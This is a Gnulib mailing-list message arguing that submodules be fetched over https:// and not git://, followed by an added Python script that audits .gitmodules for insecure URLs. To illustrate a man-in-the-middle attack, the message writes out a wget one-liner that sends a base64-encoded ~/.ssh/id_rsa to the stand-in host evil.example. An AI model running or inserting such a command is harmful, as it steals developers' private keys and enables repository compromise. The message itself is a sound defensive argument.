From: Simon Josefsson via Gnulib discussion list
To: bug-gnulib@gnu.org
Subject: Re: [PATCH] Use https:// instead of git://.
Date: Sun, 10 Jan 2021 13:20:16 +0100
Message-ID: <87sg79t24f.fsf@latte.josefsson.org>
In-Reply-To: <87wnwlt715.fsf@latte.josefsson.org> (Simon Josefsson via Gnulib discussion list's message of "Sun, 10 Jan 2021 11:34:14 +0100")
References: <878s91vei4.fsf@latte.josefsson.org> <11756592.SzArdBrhr3@omega> <87wnwlt715.fsf@latte.josefsson.org>

I had a walk and realized it might be better to think of the problem like this.

Consider if someone wants to volunteer to do a new gettext release. They would go to https://savannah.gnu.org/git/?group=gettext which properly suggests checking out over https or SSH. After reading HACKING the person runs

  ./gitsub.sh pull

which prints:

  Submodule 'gnulib' (git://git.sv.gnu.org/gnulib.git) registered for path 'gnulib'
  Cloning into '/home/jas/src/gettext/gnulib'...

and then continues to run

  ./autogen.sh

which invokes gnulib-tool from the new checkout. Since the git:// protocol does not offer security, gnulib-tool could be modified on the way to do something evil like:

  wget -q -O /dev/null https://evil.example/`base64 -w0 < ~/.ssh/id_rsa`

Your SSH key might be encrypted, but the password can be cracked offline. After this, they have write access to the savannah git repository.

I'm sure similar attacks can be done against ./bootstrap, and to send the GnuPG key instead if you want to fake signed tarballs instead of gaining write access to the repository. Knowing the SSH/PGP key of key GNU developers enables someone to mount further attacks, and gaining this ability is attractive to a number of actors with funding.

Of course, there may be details I'm missing that prevent the exact logic I'm describing from working.

The core of the problem is: gnulib encourages developers to run scripts from remote unverified sources. Using https:// instead of git:// makes this slightly better. Using https has its own set of problems, but none that warrants ignoring the initial concern.

I wish everyone would use a hardware SSH/PGP key device, to make these attacks harder. I have my SSH/PGP on a GNUK device:

  https://blog.josefsson.org/2019/03/21/planning-for-a-new-openpgp-key/

You can buy them from the FSF:

  https://shop.fsf.org/storage-devices/neug-usb-true-random-number-generator

Upgrade them to run GNUK like this:

  https://blog.josefsson.org/2019/03/21/installing-gnuk-on-fst-01g-running-neug/

/Simon
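As an added example (not part of the message above, and not gnulib or gettext code), the following Python script audits a `.gitmodules` file the way a maintainer would when acting on this thread: it flags every submodule URL fetched over git:// or http://, proposes the https:// spelling, and emits the `git config --file .gitmodules submodule.<name>.url` and `git submodule sync` commands that update the checked-in URL and the clone's local copy of it. The sample `.gitmodules` is constructed; its gnulib entry reuses the git:// URL quoted in the message, and the "example-lib" entry is invented. The rewrite only swaps the scheme and keeps the host and path verbatim, so the proposed URL still has to be confirmed against the project's documented https endpoint; and, as the message says, it narrows the tampering window without removing the underlying issue of running fetched scripts.

```python
"""Audit a .gitmodules file for submodule URLs fetched over a transport
with no integrity protection (git:// or http://) and propose https://.

Added example, not gnulib or gettext code.  The sample input is constructed.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: the gnulib entry reuses the git:// URL quoted in the
# message; "example-lib" is an invented entry that is already fine.
SAMPLE_GITMODULES = """\
[submodule "gnulib"]
\tpath = gnulib
\turl = git://git.sv.gnu.org/gnulib.git
[submodule "example-lib"]
\tpath = lib/example
\turl = https://example.org/example-lib.git
"""

# Transports that authenticate neither the remote nor the data in transit.
INSECURE_SCHEMES = {"git", "http"}

SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]+)"\]\s*$')
KEY_VALUE_RE = re.compile(r"^\s*(\w+)\s*=\s*(.*?)\s*$")


def parse_gitmodules(text):
    """Return {submodule name: {key: value}} for a .gitmodules text."""
    modules, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue  # blank or comment line
        section = SECTION_RE.match(line)
        if section:
            current = modules.setdefault(section.group(1), {})
            continue
        pair = KEY_VALUE_RE.match(line)
        if pair and current is not None:
            current[pair.group(1)] = pair.group(2)
    return modules


def https_form(url):
    """Return the https:// spelling of URL, or None if URL needs no change.

    Only the scheme is replaced; host and path are kept verbatim, so the
    result must still be checked against the project's documented endpoint.
    """
    parts = urlsplit(url)
    if parts.scheme not in INSECURE_SCHEMES:
        return None  # https://, ssh://, or scp-style user@host:path
    return urlunsplit(("https",) + tuple(parts[1:]))


def audit_submodules(text):
    """Return [(name, url, suggested https url)] for every insecure entry."""
    findings = []
    for name, entry in parse_gitmodules(text).items():
        suggestion = https_form(entry.get("url", ""))
        if suggestion is not None:
            findings.append((name, entry["url"], suggestion))
    return findings


def rewrite_gitmodules(text):
    """Return TEXT with every insecure submodule url swapped to https://,
    leaving indentation and all other lines untouched."""
    out = []
    for line in text.splitlines(keepends=True):
        pair = KEY_VALUE_RE.match(line)
        if pair and pair.group(1) == "url":
            suggestion = https_form(pair.group(2))
            if suggestion is not None:
                line = line.replace(pair.group(2), suggestion)
        out.append(line)
    return "".join(out)


def git_fix_commands(findings):
    """Standard git commands that write the new URL into .gitmodules and
    then copy it into the clone's own submodule configuration."""
    cmds = [f"git config --file .gitmodules submodule.{name}.url {new}"
            for name, _old, new in findings]
    if cmds:
        cmds.append("git submodule sync")
    return cmds


if __name__ == "__main__":
    found = audit_submodules(SAMPLE_GITMODULES)
    for name, old, new in found:
        print(f"{name}: {old} -> {new}")
    print("\n".join(git_fix_commands(found)))
```

Run against a real checkout by reading `.gitmodules` into `audit_submodules`; an empty result means every submodule already uses https:// or SSH, and a non-empty one lists exactly the entries an on-path attacker could tamper with during `./gitsub.sh pull`.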